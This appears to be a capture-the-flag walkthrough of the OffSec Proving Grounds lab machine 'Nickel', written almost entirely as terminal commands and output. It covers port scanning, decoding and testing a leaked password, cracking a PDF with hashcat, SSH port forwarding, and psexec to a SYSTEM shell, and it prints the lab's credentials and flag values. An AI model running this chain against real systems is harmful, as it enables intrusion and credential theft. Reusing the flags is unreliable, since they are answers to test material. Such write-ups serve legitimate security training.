Nickel

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nickel]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.172.99
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-13 02:39 EST
Nmap scan report for 192.168.172.99                                                                                                                                         
Host is up, received reset ttl 125 (0.21s latency).                                                                                                                         
Scanned at 2025-11-13 02:39:12 EST for 261s                                                                                                                                 
Not shown: 65518 closed tcp ports (reset)                                                                                                                                   
PORT      STATE SERVICE       REASON          VERSION                                                                                                                       
21/tcp    open  ftp           syn-ack ttl 125 FileZilla ftpd 0.9.60 beta                                                                                                    
| ftp-syst:                                                                                                                                                                 
|_  SYST: UNIX emulated by FileZilla                                                                                                                                        
22/tcp    open  ssh           syn-ack ttl 125 OpenSSH for_Windows_8.1 (protocol 2.0)                                                                                        
| ssh-hostkey:                                                                                                                                                              
|   3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)                                                                                                              
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYR4Bx82VWETlsjIFs21j6lZ6/S40jMJvuXF+ay4Qz4b+ws2YobB5h0+IrHdr3epMNFmSY8JXFWzIILhkvF/rmadXRtGwib1VZkSa3nr5oYdMajoWK0jOVSoFJmDTJvhj+T3
XE7+Q0tEkQ2EeGPrz7nK5XWzBp8SZdywCE/iz1HLvUIlsOqpDWHSjrnjkUaaleTgoVTEi63Dx4inY2KS5mX2mnS/mLzMlLZ0qj8vL9gz6ZJgf7LMNhXb/pWOtxfn6zmSoVHXEXgubXwLtrn4wOIvbZkm5/uEx+eFzx1AOEQ2LjaK
ItEqLlP3E5sdutVP6yymDTGBtlXgfvtfGS2lgZiitorAXjjND6Sqcppp5lQJk2XSBJC58U0SzjXdyflJwsus5mnKnX79nKxXPNPwM6Z3Ki1O9vE+KsJ1dZJuaTINVgLqrgwJ7BCkI2HyojfqzjHs4FlYVHnukjqunG90OMyAASSR
0oEnUTPqFmrtL/loEc3h44GT+8m9JS1LgdExU=                                                                                                                                      
|   256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)                       
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDJYE805huwKUl0fJM8+N9Mk7GUQeEEc5iA/yYqgxE7Bwgz4h5xufRONkR6bWxcxu8/AHslwkkDkjRKNdr4uFzY=          
|   256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)                                                                                                           
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL8cLYuHBTVFfYPb/YzUIyT39bUzA/sPDFEC/xChZyZ4
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC                                                                                                         
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn                                                                                                 
445/tcp   open  microsoft-ds? syn-ack ttl 125                                                                                                                               
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services                                                                                                   
|_ssl-date: 2025-11-13T07:43:33+00:00; +2s from scanner time.                                                                                                               
| ssl-cert: Subject: commonName=nickel                                                                                                                                      
| Issuer: commonName=nickel                                                                                                                                                 
| Public Key type: rsa                                                                                                                                                      
| Public Key bits: 2048                                                                                                                                                     
| Signature Algorithm: sha256WithRSAEncryption                                                                                                                              
| Not valid before: 2025-11-12T07:38:32                                                                                                                                     
| Not valid after:  2026-05-14T07:38:32                                                                                                                                     
| MD5:   02fa:6ed8:3ec4:a13f:d75a:f4f2:3455:aeb8                                      
| SHA-1: 02c7:ff74:a0a7:ed48:f3df:cafb:0781:f1dc:f4d4:3dc0                                                                                                                  
| -----BEGIN CERTIFICATE-----                                                                                                                                               
| MIIC0DCCAbigAwIBAgIQQkpWp3K5GJpD0VFBFH1h/DANBgkqhkiG9w0BAQsFADAR
<snipped>
|_-----END CERTIFICATE-----
| rdp-ntlm-info: 
|   Target_Name: NICKEL
|   NetBIOS_Domain_Name: NICKEL
|   NetBIOS_Computer_Name: NICKEL
|   DNS_Domain_Name: nickel
|   DNS_Computer_Name: nickel
|   Product_Version: 10.0.18362
|_  System_Time: 2025-11-13T07:42:21+00:00
5040/tcp  open  unknown       syn-ack ttl 125
7680/tcp  open  pando-pub?    syn-ack ttl 125
8089/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0 
|_http-title: Site doesn''t have a title.
|_http-favicon: Unknown favicon MD5: 9D1EAD73E678FA2F51A70A933B0BF017
| http-methods: 
|_  Supported Methods: GET
33333/tcp open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0 
|_http-title: Site doesn't have a title.
|_http-favicon: Unknown favicon MD5: 76C5844B4ABE20F72AA23CBE15B2494E
| http-methods: 
|_  Supported Methods: GET POST
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nickel]                                                                                                                     
└─$ nxc smb 192.168.172.99 -u ariah -p Tm93aXNlU2xvb3BUaGVvcnkxMzkK
SMB         192.168.172.99  445    NICKEL           [*] Windows 10 / Server 2019 Build 18362 x64 (name:NICKEL) (domain:nickel) (signing:False) (SMBv1:False)
SMB         192.168.172.99  445    NICKEL           [-] nickel\ariah:Tm93aXNlU2xvb3BUaGVvcnkxMzkK STATUS_LOGON_FAILURE

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nickel]                                                                                                                     
└─$ echo 'Tm93aXNlU2xvb3BUaGVvcnkxMzkK' | base64 -d                                                                                                                         
NowiseSloopTheory139                                                                                                                                                        
                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nickel]                                                                                                                     
└─$ nxc smb 192.168.172.99 -u ariah -p NowiseSloopTheory139                                                                                                                 
SMB         192.168.172.99  445    NICKEL           [*] Windows 10 / Server 2019 Build 18362 x64 (name:NICKEL) (domain:nickel) (signing:False) (SMBv1:False)                
SMB         192.168.172.99  445    NICKEL           [+] nickel\ariah:NowiseSloopTheory139

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nickel]
└─$ nxc ftp 192.168.172.99 -u ariah -p NowiseSloopTheory139
FTP         192.168.172.99  21     192.168.172.99   [+] ariah:NowiseSloopTheory139

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nickel/ftp]                                                                                                                     
└─$ ftp ariah@192.168.172.99                                                                                                                                                
Connected to 192.168.172.99.                                                                                                                                                
220-FileZilla Server 0.9.60 beta                                                                                                                                            
220-written by Tim Kosse (tim.kosse@filezilla-project.org)                                                                                                                  
220 Please visit https://filezilla-project.org/                                                                                                                             
331 Password required for ariah                                                                                                                                             
Password:                                                                                                                                                                   
230 Logged on                                                                                                                                                               
Remote system type is UNIX.                                                                                                                                                 
Using binary mode to transfer files.                                                                                                                                        
ftp> ls -la
229 Entering Extended Passive Mode (|||51717|)
150 Opening data channel for directory listing of "/"
-r--r--r-- 1 ftp ftp          46235 Sep 01  2020 Infrastructure.pdf
226 Successfully transferred "/"
ftp> get Infrastructure.pdf
local: Infrastructure.pdf remote: Infrastructure.pdf
229 Entering Extended Passive Mode (|||58953|)
150 Opening data channel for file download from server of "/Infrastructure.pdf"
100% |*******************************************************************************************************************************| 46235       52.85 KiB/s    00:00 ETA
226 Successfully transferred "/Infrastructure.pdf"
46235 bytes received in 00:00 (52.84 KiB/s) 
ftp> exit
221 Goodbye

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nickel/ftp]
└─$ file Infrastructure.pdf 
Infrastructure.pdf: PDF document, version 1.7, 1 page(s)

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Nickel/ftp]
└─$ open Infrastructure.pdf

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Nickel/ftp]
└─$ pdf2john Infrastructure.pdf
Infrastructure.pdf:$pdf$4*4*128*-1060*1*16*14350d814f7c974db9234e3e719e360b*32*6aa1a24681b93038947f76796470dbb100000000000000000000000000000000*32*d9363dc61ac080ac4b9dad4f0
36888567a2d468a6703faf6216af1eb307921b0

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Nickel/ftp]
└─$ pdf2john Infrastructure.pdf > pdf.hash

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Nickel/ftp]
└─$ hashcat pdf.hash /usr/share/wordlists/rockyou.txt --username
hashcat (v7.1.2) starting in autodetect mode

<snipped>

$pdf$4*4*128*-1060*1*16*14350d814f7c974db9234e3e719e360b*32*6aa1a24681b93038947f76796470dbb100000000000000000000000000000000*32*d9363dc61ac080ac4b9dad4f036888567a2d468a6703
faf6216af1eb307921b0:ariah4168
                                                           
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10500 (PDF 1.4 - 1.6 (Acrobat 5 - 8))
Hash.Target......: $pdf$4*4*128*-1060*1*16*14350d814f7c974db9234e3e719...7921b0
Time.Started.....: Thu Nov 13 03:01:09 2025 (33 secs)
Time.Estimated...: Thu Nov 13 03:01:42 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-32 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:   296.1 kH/s (12.73ms) @ Accel:838 Loops:70 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10007366/14344385 (69.77%)
Rejected.........: 1646/10007366 (0.02%)
Restore.Point....: 10002338/14344385 (69.73%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-70
Candidate.Engine.: Device Generator
Candidates.#01...: aries55218@ -> argi1984
Hardware.Mon.#01.: Util: 66%

<snipped>

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nickel]
└─$ nxc ssh 192.168.172.99 -u ariah -p NowiseSloopTheory139                            
SSH         192.168.172.99  22     192.168.172.99   [*] SSH-2.0-OpenSSH_for_Windows_8.1
SSH         192.168.172.99  22     192.168.172.99   [+] ariah:NowiseSloopTheory139 (Pwn3d!) with UAC - Windows - Shell access!

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nickel]
└─$ ssh ariah@192.168.172.99
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
ariah@192.168.172.99's password: 
Microsoft Windows [Version 10.0.18362.1016] 
(c) 2019 Microsoft Corporation. All rights reserved.

ariah@NICKEL C:\Users\ariah>

ariah@NICKEL C:\Users\ariah>netstat -ano | findstr LISTENING
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       2000
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       1228
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       840
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1004
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:8089           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:33333          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       648
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       520
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       532
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       996
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       612
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       1904
  TCP    127.0.0.1:14147        0.0.0.0:0              LISTENING       2000
  TCP    192.168.172.99:139     0.0.0.0:0              LISTENING       4
  TCP    [::]:21                [::]:0                 LISTENING       2000
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       840
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:3389              [::]:0                 LISTENING       1004
  TCP    [::]:8089              [::]:0                 LISTENING       4
  TCP    [::]:33333             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       648
  TCP    [::]:49665             [::]:0                 LISTENING       520
  TCP    [::]:49666             [::]:0                 LISTENING       532
  TCP    [::]:49667             [::]:0                 LISTENING       996
  TCP    [::]:49668             [::]:0                 LISTENING       612
  TCP    [::]:49669             [::]:0                 LISTENING       1904
  TCP    [::1]:14147            [::]:0                 LISTENING       2000

ariah@NICKEL C:\Users\ariah>curl http://localhost/backup
<!doctype html><html><body>Incorrect Parameter</body></html>

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nickel]
└─$ ssh ariah@192.168.172.99 -L 8000:127.0.0.1:80 -N
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
ariah@192.168.172.99's password:

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Nickel]
└─$ netstat -ano | grep 8000
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:52658         127.0.0.1:8000          ESTABLISHED keepalive (4.14/0/0)
tcp        0      0 127.0.0.1:8000          127.0.0.1:52658         ESTABLISHED off (0.00/0/0)
tcp6       0      0 ::1:8000                :::*                    LISTEN      off (0.00/0/0)

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Nickel/ftp]
└─$ ss -tunlp | grep 8000  
tcp   LISTEN 0      128             127.0.0.1:8000       0.0.0.0:*    users:(("ssh",pid=30368,fd=5)) 
tcp   LISTEN 0      128                 [::1]:8000          [::]:*    users:(("ssh",pid=30368,fd=4))

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Nickel]
└─$ nxc smb 192.168.172.99 -u administrator -p password123                             
SMB         192.168.172.99  445    NICKEL           [*] Windows 10 / Server 2019 Build 18362 x64 (name:NICKEL) (domain:nickel) (signing:False) (SMBv1:False) 
SMB         192.168.172.99  445    NICKEL           [+] nickel\administrator:password123 (Pwn3d!)

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Nickel]
└─$ rlwrap impacket-psexec administrator:password123@192.168.172.99
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 192.168.172.99.....
[*] Found writable share ADMIN$
[*] Uploading file NhCJrHKe.exe
[*] Opening SVCManager on 192.168.172.99.....
[*] Creating service hmGB on 192.168.172.99.....
[*] Starting service hmGB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18362.1016] 
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type \Users\Administrator\Desktop\proof.txt
bd365213116822f811cfe8420804aca5

C:\Windows\system32> type \Users\ariah\Desktop\local.txt
292f224451cbe03f3dc3cc2769a7524c

PreviousCraft NextShenzi

Last updated 2 months ago

hashtagEnumeration:

hashtagPort Scanning:

Enumeration:

Port Scanning: